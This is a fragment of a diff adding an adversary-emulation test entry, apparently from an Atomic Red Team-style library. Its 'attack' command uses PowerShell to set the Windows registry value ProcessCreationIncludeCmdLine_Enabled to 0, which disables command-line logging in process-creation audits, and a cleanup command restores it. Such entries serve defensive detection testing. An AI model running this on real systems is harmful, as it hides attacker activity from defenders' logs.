+https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+echo "Commencing Attack - Disabling Registry Value"
+New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
+```
+
+#### Cleanup Commands:
+```cmd
+echo "Commencing Cleanup - Restoring Registry Value"
+New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>